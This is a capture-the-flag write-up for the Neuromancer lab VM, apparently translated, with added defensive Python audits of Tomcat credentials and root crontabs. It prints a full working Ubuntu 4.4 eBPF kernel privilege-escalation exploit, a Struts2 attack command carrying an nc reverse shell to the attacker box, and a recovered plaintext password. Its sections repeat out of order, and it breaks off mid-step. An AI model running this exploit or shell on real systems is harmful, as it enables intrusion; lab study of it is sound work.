/bin/sh: 0: can't access tty; job control turned off
$ id
uid=1000(ta) gid=1000(ta) groups=1000(ta),4(adm),24(cdrom),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare)
$ whoami
ta

We now have a foothold on Neuromancer. Checking the home directory of the "ta" user reveals something interesting: this note points to the Tomcat directory.

$ cat ai-gui-guide.txt
Application for Neuromancer remote access interface includes:

-Maven - /opt/
-Java jdk - /usr/lib/jvm/
-Tomcat - /usr/local/tomcat/
-Struts2 - /home/ta/myWebApp/
- war files are in /root. Update these ASAP to improve security.

Reduce installation of apps to ONLY what's needed, seucure configurations and follow app security best practices.

Tomcat stores its users and passwords in a file called tomcat-users.xml. Reading it reveals the password of another user on the system, "lady3jane".

$ cat tomcat-users.xml
<?xml version="1.0" encoding="UTF-8"?>
<tomcat-users xmlns="http://tomcat.apache.org/xml"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://tomcat.apache.org/xml tomcat-users.xsd"
version="1.0">
<!--
Eng.,

Tomcat is still using basic auth. I encoded the password so the AI's security scans don't flag it.

Is this what Bob keeps talking about, "Security by obscurity?"

Ed Occam//Sys.Engineer I//Night City
"Harry, I took care of it" - Llyod Christmas
-->

<role rolename="manager-gui"/>
<user username="Lady3Jane" password="&gt;&#33;&#88;&#120;&#51;&#74;&#97;&#110;&#101;&#120;&#88;&#33;&lt;" roles="manager-gui"/>

<!--
<role rolename="role1"/>
<user username="tomcat" password="<must-be-changed>" roles="tomcat"/>
<user username="both" password="<must-be-changed>" roles="tomcat,role1"/>
<user username="role1" password="<must-be-changed>" roles="role1"/>
-->
</tomcat-users>
  • Alternatively, the Struts 2 exploit tool can be used to upload a Behinder (冰蝎) webshell to get a shell :)
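The comment in the file says the password was encoded so that scans would not flag it. Entity and character references are part of XML syntax, so every parser, Tomcat's included, decodes them before the value is used; the encoding hides nothing from anyone who reads the file. The audit below is an added example written for this page (mine, not the write-up's or Tomcat's code): it parses a tomcat-users.xml, treats any password that is not in a digest form as cleartext, and flags users holding manager roles. The sample XML is constructed: the Lady3Jane entry is copied from the file above, and the two other users are invented to show a hashed credential and an unprivileged account.

```python
import re
import xml.etree.ElementTree as ET

# Constructed tomcat-users.xml: the Lady3Jane entry is copied from the file
# shown above; "ops" (hashed credential) and "reader" are made up for contrast.
TOMCAT_USERS_XML = """<?xml version="1.0" encoding="UTF-8"?>
<tomcat-users xmlns="http://tomcat.apache.org/xml"
              xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
              xsi:schemaLocation="http://tomcat.apache.org/xml tomcat-users.xsd"
              version="1.0">
  <role rolename="manager-gui"/>
  <role rolename="manager-script"/>
  <user username="Lady3Jane" password="&gt;&#33;&#88;&#120;&#51;&#74;&#97;&#110;&#101;&#120;&#88;&#33;&lt;" roles="manager-gui"/>
  <user username="ops" password="f1e2d3c4b5a69788$100000$9f86d081884c7d659a2feaa0c55ad015a3bf4f1b2b0b822cd15d6c15b0f00a08" roles="manager-script"/>
  <user username="reader" password="readonly" roles="probe"/>
</tomcat-users>
"""

# Tomcat's MessageDigestCredentialHandler stores either a bare hex digest or
# "salt$iterations$digest"; anything else in the password attribute is cleartext.
HASHED_RE = re.compile(r"^(?:[0-9a-f]{32,}|[0-9a-f]+\$\d+\$[0-9a-f]{32,})$", re.I)

# Roles that grant deployment or administrative access through the manager
# and host-manager web applications.
PRIVILEGED_ROLES = {"manager-gui", "manager-script", "manager-jmx",
                    "manager-status", "admin-gui", "admin-script"}


def parse_users(xml_text):
    """Return (username, password, roles) for every <user>. ElementTree decodes
    character and entity references while parsing, so the entity-encoded value
    comes back as the real password, exactly as Tomcat itself reads it."""
    root = ET.fromstring(xml_text)
    users = []
    for el in root.iter():
        if el.tag.rsplit("}", 1)[-1] != "user":  # strip the XML namespace
            continue
        roles = {r.strip() for r in el.get("roles", "").split(",") if r.strip()}
        users.append((el.get("username", ""), el.get("password", ""), roles))
    return users


def is_hashed(password):
    return bool(HASHED_RE.match(password))


def audit_tomcat_users(xml_text):
    """Findings as (username, issue) pairs; secrets are deliberately not echoed."""
    findings = []
    for name, password, roles in parse_users(xml_text):
        if not is_hashed(password):
            findings.append((name, "cleartext password"))
        privileged = sorted(roles & PRIVILEGED_ROLES)
        if privileged:
            findings.append((name, "privileged roles: " + ",".join(privileged)))
    return findings


if __name__ == "__main__":
    for name, issue in audit_tomcat_users(TOMCAT_USERS_XML):
        print(f"{name}: {issue}")
```

Tomcat can store digested credentials by configuring a CredentialHandler on the realm; digest.sh in Tomcat's bin directory produces the salt$iterations$digest form the regex above accepts. Even with hashing, the more important fix is the one the engineer's own note asks for: the manager application should not be reachable from the network segment the AI interface is exposed on, and the password should not be reused for the lady3jane SSH account.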

Privilege escalation 1

&gt;&#33;&#88;&#120;&#51;&#74;&#97;&#110;&#101;&#120;&#88;&#33;&lt;

HTML entity decoding gives: >!Xx3JanexX!<

Then connect over SSH with lady3jane / >!Xx3JanexX!<

root@kali:~# ssh lady3jane@192.168.56.110 -p 34483
----------------------------------------------------------------
| Neuromancer Secure Remote Access |
| UNAUTHORIZED ACCESS will be investigated by the Turing Police |
----------------------------------------------------------------
lady3jane@192.168.56.110's password:
Welcome to Ubuntu 16.04.4 LTS (GNU/Linux 4.4.0-116-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

94 packages can be updated.
44 updates are security updates.


Last login: Wed Jan 15 23:19:21 2020 from 192.168.56.102
lady3jane@neuromancer:~$ id
uid=1001(lady3jane) gid=1001(lady3jane) groups=1001(lady3jane)
lady3jane@neuromancer:~$ whoami
lady3jane

Now, in lady3jane's home directory, there is a file that is possibly executed by cron every few minutes.

lady3jane@neuromancer:~$ cat custom-tomcat-chk.sh
#!/bin/bash
# Health check for Neuromancer (root) to execute every 3 minutes.
# ..the AI tells me it can maintain security, server health, etc w/o forced intervention,
# but I beg to differ...hence the cron script.

> /tmp/tomcat_status.log

health=$(curl -m 5 -Is 127.0.0.1:8080 |grep HTTP/1.1)

case "$health" in
    *200*)
        echo "Tomcat is Up" > /tmp/tomcat_status.log
        ;;
    *)
        echo "Tomcat is down" > /tmp/tomcat_status.log
        ;;
esac

However, I couldn't exploit this; it looked as though it would never be executed. So I decided to go for the vulnerable kernel instead. The kernel exploit used can be found under Linux-Kernel-4-4-0-116-Ubuntu-16-04-4-LocalPrivilege-Escalation
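The end of the write-up confirms (in root's crontab) that root does run this script every few minutes. Whether or not it was usable here, a root cron job that executes a file a regular user owns is a textbook misconfiguration: whoever can edit the file runs as root. The audit below is an added example written for this page, mine rather than the author's: it lists the commands in a crontab and checks owner and mode of each executable. The crontab lines and the ownership table are constructed (the real crontab -l output above is truncated); custom-tomcat-chk.sh and lady3jane's uid 1001 come from the page, the other two jobs are invented.

```python
import os
import shlex
import stat

# Constructed root crontab modelled on the finding in this write-up (the real
# `crontab -l` output above is truncated). The first job is the page's
# custom-tomcat-chk.sh; the other two are invented for contrast.
ROOT_CRONTAB = """\
# m h  dom mon dow   command
*/3 * * * * /home/lady3jane/custom-tomcat-chk.sh
0 2 * * * /usr/local/sbin/backup.sh --quiet
@reboot /opt/tomcat/bin/startup.sh
"""

# Constructed ownership facts for those paths: path -> (owner uid, permission bits).
FAKE_FS = {
    "/home/lady3jane/custom-tomcat-chk.sh": (1001, 0o755),  # owned by lady3jane (uid 1001 above)
    "/usr/local/sbin/backup.sh": (0, 0o755),                 # root-owned, only root can write
    "/opt/tomcat/bin/startup.sh": (0, 0o777),                # root-owned but world-writable
}


def fake_stat(path):
    """Stand-in for os.stat driven by FAKE_FS, so the audit runs offline."""
    return FAKE_FS[path]


def live_stat(path):
    """Real (uid, mode bits) of a file, for use on an actual host."""
    st = os.stat(path)
    return st.st_uid, stat.S_IMODE(st.st_mode)


def cron_commands(crontab_text):
    """Yield (schedule, command) for each job line, handling both the
    five-field schedule form and @reboot-style keywords."""
    for raw in crontab_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("@"):
            sched, _, cmd = line.partition(" ")
        else:
            parts = line.split(None, 5)
            if len(parts) < 6:
                continue
            sched, cmd = " ".join(parts[:5]), parts[5]
        yield sched, cmd.strip()


def executable_of(cmd):
    """First token of the command line: the file cron will actually execute."""
    try:
        tokens = shlex.split(cmd)
    except ValueError:
        tokens = cmd.split()
    return tokens[0] if tokens else ""


def audit_crontab(crontab_text, stat_fn=live_stat, cron_uid=0):
    """Return (executable, reason) for jobs whose executable is owned by a user
    other than the one cron runs them as, or is group/world-writable: anyone
    who can change that file gets code execution as cron_uid."""
    findings = []
    for _sched, cmd in cron_commands(crontab_text):
        exe = executable_of(cmd)
        if not os.path.isabs(exe):
            continue  # commands resolved via PATH need a separate check
        try:
            uid, mode = stat_fn(exe)
        except (OSError, KeyError):
            findings.append((exe, "does not exist"))
            continue
        reasons = []
        if uid != cron_uid:
            reasons.append(f"owned by uid {uid}")
        if mode & (stat.S_IWGRP | stat.S_IWOTH):
            reasons.append("group/world writable")
        if reasons:
            findings.append((exe, "; ".join(reasons)))
    return findings


if __name__ == "__main__":
    for exe, why in audit_crontab(ROOT_CRONTAB, stat_fn=fake_stat):
        print(f"root cron job {exe}: {why}")
```

On a real host, call audit_crontab with the default live_stat on the output of crontab -l and on the files under /etc/cron.d. The ownership of the parent directories matters as much as the file itself (a root-owned script inside a user's home directory can still be replaced by that user), so a production version should walk up the path the same way.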

Let's take a look at the kernel privilege escalation exploit. It's beautiful... When will I ever reach that level??? :):):):):):):):):):):):)

root@kali:~# cat 44298.c
/*
 * Ubuntu 16.04.4 kernel priv esc
 *
 * all credits to @bleidl
 * - vnik
 */

// Tested on:
// 4.4.0-116-generic #140-Ubuntu SMP Mon Feb 12 21:23:04 UTC 2018 x86_64
// if different kernel adjust CRED offset + check kernel stack size
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <errno.h>
#include <fcntl.h>
#include <string.h>
#include <linux/bpf.h>
#include <linux/unistd.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/un.h>
#include <sys/stat.h>
#include <stdint.h>

#define PHYS_OFFSET 0xffff880000000000
#define CRED_OFFSET 0x5f8
#define UID_OFFSET 4
#define LOG_BUF_SIZE 65536
#define PROGSIZE 328

int sockets[2];
int mapfd, progfd;

char *__prog = "\xb4\x09\x00\x00\xff\xff\xff\xff"
    "\x55\x09\x02\x00\xff\xff\xff\xff"
    "\xb7\x00\x00\x00\x00\x00\x00\x00"
    "\x95\x00\x00\x00\x00\x00\x00\x00"
    "\x18\x19\x00\x00\x03\x00\x00\x00"
    "\x00\x00\x00\x00\x00\x00\x00\x00"
    "\xbf\x91\x00\x00\x00\x00\x00\x00"
    "\xbf\xa2\x00\x00\x00\x00\x00\x00"
    "\x07\x02\x00\x00\xfc\xff\xff\xff"
    "\x62\x0a\xfc\xff\x00\x00\x00\x00"
    "\x85\x00\x00\x00\x01\x00\x00\x00"
    "\x55\x00\x01\x00\x00\x00\x00\x00"
    "\x95\x00\x00\x00\x00\x00\x00\x00"
    "\x79\x06\x00\x00\x00\x00\x00\x00"
    "\xbf\x91\x00\x00\x00\x00\x00\x00"
    "\xbf\xa2\x00\x00\x00\x00\x00\x00"
    "\x07\x02\x00\x00\xfc\xff\xff\xff"
    "\x62\x0a\xfc\xff\x01\x00\x00\x00"
    "\x85\x00\x00\x00\x01\x00\x00\x00"
    "\x55\x00\x01\x00\x00\x00\x00\x00"
    "\x95\x00\x00\x00\x00\x00\x00\x00"
    "\x79\x07\x00\x00\x00\x00\x00\x00"
    "\xbf\x91\x00\x00\x00\x00\x00\x00"
    "\xbf\xa2\x00\x00\x00\x00\x00\x00"
    "\x07\x02\x00\x00\xfc\xff\xff\xff"
    "\x62\x0a\xfc\xff\x02\x00\x00\x00"
    "\x85\x00\x00\x00\x01\x00\x00\x00"
    "\x55\x00\x01\x00\x00\x00\x00\x00"
    "\x95\x00\x00\x00\x00\x00\x00\x00"
    "\x79\x08\x00\x00\x00\x00\x00\x00"
    "\xbf\x02\x00\x00\x00\x00\x00\x00"
    "\xb7\x00\x00\x00\x00\x00\x00\x00"
    "\x55\x06\x03\x00\x00\x00\x00\x00"
    "\x79\x73\x00\x00\x00\x00\x00\x00"
    "\x7b\x32\x00\x00\x00\x00\x00\x00"
    "\x95\x00\x00\x00\x00\x00\x00\x00"
    "\x55\x06\x02\x00\x01\x00\x00\x00"
    "\x7b\xa2\x00\x00\x00\x00\x00\x00"
    "\x95\x00\x00\x00\x00\x00\x00\x00"
    "\x7b\x87\x00\x00\x00\x00\x00\x00"
    "\x95\x00\x00\x00\x00\x00\x00\x00";

char bpf_log_buf[LOG_BUF_SIZE];

static int bpf_prog_load(enum bpf_prog_type prog_type,
                         const struct bpf_insn *insns, int prog_len,
                         const char *license, int kern_version) {
    union bpf_attr attr = {
        .prog_type = prog_type,
        .insns = (__u64)insns,
        .insn_cnt = prog_len / sizeof(struct bpf_insn),
        .license = (__u64)license,
        .log_buf = (__u64)bpf_log_buf,
        .log_size = LOG_BUF_SIZE,
        .log_level = 1,
    };

    attr.kern_version = kern_version;

    bpf_log_buf[0] = 0;

    return syscall(__NR_bpf, BPF_PROG_LOAD, &attr, sizeof(attr));
}

static int bpf_create_map(enum bpf_map_type map_type, int key_size, int value_size,
                          int max_entries) {
    union bpf_attr attr = {
        .map_type = map_type,
        .key_size = key_size,
        .value_size = value_size,
        .max_entries = max_entries
    };

    return syscall(__NR_bpf, BPF_MAP_CREATE, &attr, sizeof(attr));
}

static int bpf_update_elem(uint64_t key, uint64_t value) {
    union bpf_attr attr = {
        .map_fd = mapfd,
        .key = (__u64)&key,
        .value = (__u64)&value,
        .flags = 0,
    };

    return syscall(__NR_bpf, BPF_MAP_UPDATE_ELEM, &attr, sizeof(attr));
}

static int bpf_lookup_elem(void *key, void *value) {
    union bpf_attr attr = {
        .map_fd = mapfd,
        .key = (__u64)key,
        .value = (__u64)value,
    };

    return syscall(__NR_bpf, BPF_MAP_LOOKUP_ELEM, &attr, sizeof(attr));
}

static void __exit(char *err) {
    fprintf(stderr, "error: %s\n", err);
    exit(-1);
}

static void prep(void) {
    mapfd = bpf_create_map(BPF_MAP_TYPE_ARRAY, sizeof(int), sizeof(long long), 3);
    if (mapfd < 0)
        __exit(strerror(errno));

    progfd = bpf_prog_load(BPF_PROG_TYPE_SOCKET_FILTER,
                           (struct bpf_insn *)__prog, PROGSIZE, "GPL", 0);

    if (progfd < 0)
        __exit(strerror(errno));

    if(socketpair(AF_UNIX, SOCK_DGRAM, 0, sockets))
        __exit(strerror(errno));

    if(setsockopt(sockets[1], SOL_SOCKET, SO_ATTACH_BPF, &progfd, sizeof(progfd)) < 0)
        __exit(strerror(errno));
}

static void writemsg(void) {
    char buffer[64];

    ssize_t n = write(sockets[0], buffer, sizeof(buffer));

    if (n < 0) {
        perror("write");
        return;
    }
    if (n != sizeof(buffer))
        fprintf(stderr, "short write: %lu\n", n);
}

#define __update_elem(a, b, c) \
    bpf_update_elem(0, (a)); \
    bpf_update_elem(1, (b)); \
    bpf_update_elem(2, (c)); \
    writemsg();

static uint64_t get_value(int key) {
    uint64_t value;

    if (bpf_lookup_elem(&key, &value))
        __exit(strerror(errno));

    return value;
}

static uint64_t __get_fp(void) {
    __update_elem(1, 0, 0);

    return get_value(2);
}

static uint64_t __read(uint64_t addr) {
    __update_elem(0, addr, 0);

    return get_value(2);
}

static void __write(uint64_t addr, uint64_t val) {
    __update_elem(2, addr, val);
}

static uint64_t get_sp(uint64_t addr) {
    return addr & ~(0x4000 - 1);
}

static void pwn(void) {
    uint64_t fp, sp, task_struct, credptr, uidptr;

    fp = __get_fp();
    if (fp < PHYS_OFFSET)
        __exit("bogus fp");

    sp = get_sp(fp);
    if (sp < PHYS_OFFSET)
        __exit("bogus sp");

    task_struct = __read(sp);

    if (task_struct < PHYS_OFFSET)
        __exit("bogus task ptr");

    printf("task_struct = %lx\n", task_struct);

    credptr = __read(task_struct + CRED_OFFSET); // cred

    if (credptr < PHYS_OFFSET)
        __exit("bogus cred ptr");

    uidptr = credptr + UID_OFFSET; // uid
    if (uidptr < PHYS_OFFSET)
        __exit("bogus uid ptr");

    printf("uidptr = %lx\n", uidptr);
    __write(uidptr, 0); // set both uid and gid to 0

    if (getuid() == 0) {
        printf("spawning root shell\n");
        system("/bin/bash");
        exit(0);
    }

    __exit("not vulnerable?");
}

int main(int argc, char **argv) {
    prep();
    pwn();

    return 0;
}

Use the sed command below to strip the Windows carriage returns (CRLF line endings) from the C source so that it compiles cleanly:

root@kali:~# sed -i -e 's/\r$//' 44298.c

Then compile it:

root@kali:~# gcc 44298.c -o 44298

Finally, download it onto the target, make it executable and run the exploit:

root@kali:~# python -m SimpleHTTPServer 
Serving HTTP on 0.0.0.0 port 8000 ...
lady3jane@neuromancer:~$ wget http://192.168.56.102:8000/44298
--2020-01-15 23:44:14-- http://192.168.56.102:8000/44298
Connecting to 192.168.56.102:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 17888 (17K) [application/octet-stream]
Saving to: ‘44298’

44298 100%[=============================================================>] 17.47K --.-KB/s in 0s

2020-01-15 23:44:14 (482 MB/s) - ‘44298’ saved [17888/17888]

lady3jane@neuromancer:~$ chmod 777 *
lady3jane@neuromancer:~$ ./44298
task_struct = ffff88003cc93800
uidptr = ffff88003579fd84
spawning root shell
root@neuromancer:~# id
uid=0(root) gid=0(root) groups=0(root),1001(lady3jane)
root@neuromancer:~# whoami
root

Root obtained; now find the flag.
root@neuromancer:~# cd /root
root@neuromancer:/root# ls
flag.txt struts2 velocity.log
root@neuromancer:/root# cat flag.txt
be3306f431dae5ebc93eebb291f4914a

Too slick...

Doing some post-exploitation enumeration, there is indeed a root crontab configured to execute a file in lady3jane's home directory.
root@neuromancer:/root# crontab -l
# Edit this file to introduce tasks to be run by cron.
#
# Each task to run has to be defined through a single line
# indicating with different fields when the task will be run
# and what command to run for the task
#
# To define the time you can provide concrete values for
# minute (m), hour (h), day of month (dom), month (mon),
# and day of week (dow) or use '*' in these fields (for 'any').#
# Notice that tasks will be started based on the cron's system
# daemon's notion of time and timezones.
#
# Output of the crontab jobs (including errors) is sent through
# email to the user the crontab file belongs to (unless redirected).
#
# For example, you can run a backup of all your user accounts
# at 5 a.m every week with:
# 0 5 * * 1 tar -zcf /var/backups/home.tgz /home/
#
# For more information see the manual pages of crontab(5) and cron(8)
#
# m h dom mon dow command

*/3 * * * * /bin/bash /home/lady3jane/server-check.sh
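A check a defender can run against a root crontab like the one above, as an added example that is not part of the original writeup: it parses the crontab and flags root jobs whose executed script lives in a user-writable location such as /home/lady3jane. The prefix list and the interpreter list are this example's own assumptions.

```python
"""Flag root cron jobs that run scripts from user-writable locations.

Added example, not part of the original writeup. SAMPLE_CRONTAB is
constructed from the root crontab shown above; the prefix list and the
interpreter list are this example's own heuristics.
"""
import re
import shlex
from typing import List, NamedTuple, Tuple

# A root job executing from any of these lets whoever can write there run code as root.
UNTRUSTED_PREFIXES = ("/home/", "/tmp/", "/var/tmp/", "/dev/shm/")
# When argv[0] is one of these, the first non-option argument is the real script.
INTERPRETERS = {"bash", "sh", "dash", "python", "python3", "perl", "php"}


class Finding(NamedTuple):
    schedule: str
    command: str
    script: str


def parse_crontab(text: str) -> List[Tuple[str, str]]:
    """Return (schedule, command) pairs; skips comments, blanks and VAR=value lines."""
    jobs = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or re.match(r"^\w+=", line):
            continue
        if line.startswith("@"):                 # @reboot, @daily, ...
            schedule, _, command = line.partition(" ")
        else:                                    # m h dom mon dow command
            fields = line.split(None, 5)
            if len(fields) < 6:
                continue
            schedule, command = " ".join(fields[:5]), fields[5]
        jobs.append((schedule, command.strip()))
    return jobs


def executed_paths(command: str) -> List[str]:
    """Programs a command line actually executes (not every path it mentions)."""
    paths = []
    for segment in re.split(r"\s*(?:;|&&|\|\||\|)\s*", command):
        try:
            argv = shlex.split(segment)
        except ValueError:
            continue
        if not argv:
            continue
        paths.append(argv[0])
        if argv[0].rsplit("/", 1)[-1] in INTERPRETERS:
            script = next((a for a in argv[1:] if not a.startswith("-")), None)
            if script:
                paths.append(script)
    return paths


def audit_root_crontab(text: str) -> List[Finding]:
    """One Finding per executed path that lives under an untrusted prefix."""
    return [
        Finding(schedule, command, path)
        for schedule, command in parse_crontab(text)
        for path in executed_paths(command)
        if path.startswith(UNTRUSTED_PREFIXES)
    ]


# Constructed sample: the root crontab shown above plus the template's backup example.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
SHELL=/bin/sh
0 5 * * 1 tar -zcf /var/backups/home.tgz /home/
*/3 * * * * /bin/bash /home/lady3jane/server-check.sh
"""

if __name__ == "__main__":
    for f in audit_root_crontab(SAMPLE_CRONTAB):
        print(f"[{f.schedule}] root runs {f.script} (user-writable location)")
```

Note that the tar job is not flagged: /home/ is an argument it reads, not a program it executes, which is why the check looks at argv[0] and interpreter scripts rather than every absolute path.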

Privilege escalation 2

The earlier steps, probing the internal network hosts through the Wintermute-Straylight VM, are omitted here.

Reverse shell
root@kali:~/struts-pwn# python struts-pwn.py -u http://192.168.56.110:8080/struts2_2.3.15.1-showcase/showcase.action -c "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.56.102 6666 >/tmp/f"

[*] URL: http://192.168.56.110:8080/struts2_2.3.15.1-showcase/showcase.action
[*] CMD: rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.56.102 6666 >/tmp/f
EXCEPTION::::--> HTTPConnectionPool(host='192.168.56.110', port=8080): Read timed out. (read timeout=3)
ERROR
[%] Done.
root@kali:~# nc -lvp 6666
listening on [any] 6666 ...
192.168.56.110: inverse host lookup failed: Host name lookup failure
connect to [192.168.56.102] from (UNKNOWN) [192.168.56.110] 53960
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=1000(ta) gid=1000(ta) groups=1000(ta),4(adm),24(cdrom),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare)
$ whoami

We can see that "ta" appears to be an administrator, but without a TTY session that is of little use:
$ groups
ta adm cdrom dip plugdev lxd lpadmin sambashare

Since we are not in a TTY, we cannot see the output of sudo -l:
$ sudo -l
sudo: no tty present and no askpass program specified

Let us see whether python is installed so we can use the "pty" trick (Spawning a TTY Shell):
$ which python
$

No... it is not there. If we had admin privs we could install it, so that is not much use to us here.

Step 1: a proper TTY session is needed

Without a proper TTY session, not much can really be achieved. There are two options:

  • Use socat to send a reverse shell back to Kali. Socat is very handy for this; see the link earlier in this article.
  • Can the ta account be used to SSH into the box? There is no password, but perhaps a set of SSH keys can be generated. Getting into the box depends on the open ports (SSH is on 34483, and the right port forwarding is already in place). Also, what is defined for that account in /etc/passwd? It needs to include some kind of shell.
  • Look for something else. While checking /etc/passwd to determine what kind of shell "ta" has, this entry stood out:

lady3jane:x:1001:1001:3Jane,,,:/home/lady3jane:/bin/bash

After rooting "Straylight", this user had already come up in the "note.txt" file there. So... perhaps credentials for that account are lying around on this box. With that in mind, it would be worth finding login credentials for "ta" elsewhere on the box too. One possible line of enquiry is Tomcat... it defines its users in an XML file that is used to manage the Tomcat tooling.

Let us try the latter approach first.

Step 2: getting a TTY - the reused credentials option

Tomcat users are defined in tomcat-users.xml, so take a look at that file:
$ cat /usr/local/tomcat/conf/tomcat-users.xml
<?xml version="1.0" encoding="UTF-8"?>
<tomcat-users xmlns="http://tomcat.apache.org/xml"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://tomcat.apache.org/xml tomcat-users.xsd"
version="1.0">
<!--
Eng.,

Tomcat is still using basic auth. I encoded the password so the AI's security scans don't flag it.

Is this what Bob keeps talking about, "Security by obscurity?"

Ed Occam//Sys.Engineer I//Night City
"Harry, I took care of it" - Llyod Christmas
-->

<role rolename="manager-gui"/>
<user username="Lady3Jane" password="&gt;&#33;&#88;&#120;&#51;&#74;&#97;&#110;&#101;&#120;&#88;&#33;&lt;" roles="manager-gui"/>

<!--
<role rolename="role1"/>
<user username="tomcat" password="<must-be-changed>" roles="tomcat"/>
<user username="both" password="<must-be-changed>" roles="tomcat,role1"/>
<user username="role1" password="<must-be-changed>" roles="role1"/>
-->
</tomcat-users>

So the password appears to be encoded. Pasting it into Burp and HTML-decoding it yields:

>!Xx3JanexX!<

lady3jane/>!Xx3JanexX!<
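The "encoding" seen here is just XML character references, which any XML parser resolves for free, so it protects nothing. As an added example that is not part of the original writeup, the following audit parses tomcat-users.xml with Python's ElementTree and flags plaintext passwords and Manager-level roles; the sample file is a constructed cut-down copy of the one above with one digested user added, and the digest regex and role set are this example's own assumptions.

```python
"""Audit tomcat-users.xml for plaintext credentials and privileged roles.

Added example, not part of the original writeup. SAMPLE_XML is a constructed,
cut-down copy of the file shown above plus one digested user; the digest
regex and the privileged-role set are this example's own assumptions.
"""
import re
import xml.etree.ElementTree as ET
from typing import Dict, List

TOMCAT_NS = "{http://tomcat.apache.org/xml}"
PRIVILEGED_ROLES = {"manager-gui", "manager-script", "manager-jmx",
                    "manager-status", "admin-gui", "admin-script"}
# Tomcat's MessageDigestCredentialHandler stores "salt$iterations$hex" or a bare
# hex digest; anything else is treated as a plaintext password (assumption).
DIGEST_RE = re.compile(r"^(?:[0-9a-fA-F]+\$\d+\$)?[0-9a-fA-F]{32,128}$")


def load_users(xml_text: str) -> List[Dict[str, object]]:
    """One dict per <user>. The XML parser resolves &#NN; references, so the
    'encoded' password on the page comes back as the literal string."""
    root = ET.fromstring(xml_text)
    users = []
    for u in root.iter(TOMCAT_NS + "user"):   # users inside <!-- --> are not elements
        users.append({
            "username": u.get("username") or u.get("name") or "",
            "password": u.get("password", ""),
            "roles": [r.strip() for r in u.get("roles", "").split(",") if r.strip()],
        })
    return users


def audit_tomcat_users(xml_text: str) -> List[str]:
    """Findings: plaintext password, and any role that grants Manager/Host-Manager access."""
    findings = []
    for u in load_users(xml_text):
        if not DIGEST_RE.match(u["password"]):
            findings.append(f"{u['username']}: plaintext password "
                            f"(character references are not encryption)")
        privileged = sorted(set(u["roles"]) & PRIVILEGED_ROLES)
        if privileged:
            findings.append(f"{u['username']}: privileged roles {', '.join(privileged)}")
    return findings


# Constructed sample: the Lady3Jane entry from the page plus a digested 'ops' user.
SAMPLE_XML = """<?xml version="1.0" encoding="UTF-8"?>
<tomcat-users xmlns="http://tomcat.apache.org/xml" version="1.0">
  <role rolename="manager-gui"/>
  <role rolename="manager-status"/>
  <user username="Lady3Jane" password="&gt;&#33;&#88;&#120;&#51;&#74;&#97;&#110;&#101;&#120;&#88;&#33;&lt;" roles="manager-gui"/>
  <user username="ops" password="e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855" roles="manager-status"/>
  <!-- <user username="tomcat" password="<must-be-changed>" roles="tomcat"/> -->
</tomcat-users>
"""

if __name__ == "__main__":
    for line in audit_tomcat_users(SAMPLE_XML):
        print(line)
```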

SSH into neuromancer:
root@kali:~# ssh -p 34483 lady3jane@192.168.56.110
----------------------------------------------------------------
| Neuromancer Secure Remote Access |
| UNAUTHORIZED ACCESS will be investigated by the Turing Police |
----------------------------------------------------------------
lady3jane@192.168.56.110's password:

Welcome to Ubuntu 16.04.4 LTS (GNU/Linux 4.4.0-116-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

94 packages can be updated.
44 updates are security updates.


Last login: Wed Jan 15 23:19:59 2020 from 192.168.56.102
lady3jane@neuromancer:~$
lady3jane@neuromancer:~$ id
uid=1001(lady3jane) gid=1001(lady3jane) groups=1001(lady3jane)
lady3jane@neuromancer:~$ whoami
lady3jane
lady3jane@neuromancer:~$ dir
44298 custom-tomcat-chk.sh
lady3jane@neuromancer:~$ pwd
/home/lady3jane

Unfortunately, this user is not any kind of administrator and has no sudo capability:
lady3jane@neuromancer:~$ sudo -l
[sudo] password for lady3jane:
Sorry, user lady3jane may not run sudo on neuromancer.

Given that the "groups" command suggested some administrative capability for the "ta" account, let us try the "ta" account route.

Step 3: getting a TTY - the SSH key route for the "ta" account

Generating a key pair is straightforward:

  • cd into /home/ta
  • Run ssh-keygen. Accept all the defaults, but choose to set a passphrase. The keys are stored in /home/ta/.ssh
  • Add the public key to the /home/ta/.ssh/authorized_keys file
  • Print the contents of id_rsa and id_rsa.pub and copy/paste them into the corresponding files on my attack box. Also apply chmod 400 to each file, otherwise ssh complains about the permissions and ignores the key entirely, which leads to an unwanted password prompt (we do not know the password!)

Once the keys are generated and copies are placed on the attack box, access is obtained:
$ whoami
ta
$ mkdir .ssh
$ ls -la
total 60
drwxr-xr-x 7 ta ta 4096 Jan 18 20:57 .
drwxr-xr-x 4 root root 4096 Jul 1 2018 ..
-rw-rw-r-- 1 ta ta 352 Jul 1 2018 ai-gui-guide.txt
-rw------- 1 ta ta 54 Jul 3 2018 .bash_history
-rw-r--r-- 1 ta ta 220 May 18 2018 .bash_logout
-rw-r--r-- 1 ta ta 3900 May 18 2018 .bashrc
drwx------ 2 ta ta 4096 May 18 2018 .cache
drwxrwxr-x 3 ta ta 4096 May 18 2018 .m2
drwxrwxr-x 4 ta ta 4096 May 18 2018 myWebApp
drwxrwxr-x 2 ta ta 4096 May 18 2018 .oracle_jre_usage
-rw-r--r-- 1 ta ta 655 May 18 2018 .profile
drwxr-x--- 2 ta ta 4096 Jan 18 20:57 .ssh
-rw-r----- 1 ta ta 82 May 18 2018 velocity.log
-rw------- 1 ta ta 4538 Jul 1 2018 .viminfo
$ cd .ssh
$ ls
$ ssh-keygen
Generating public/private rsa key pair.
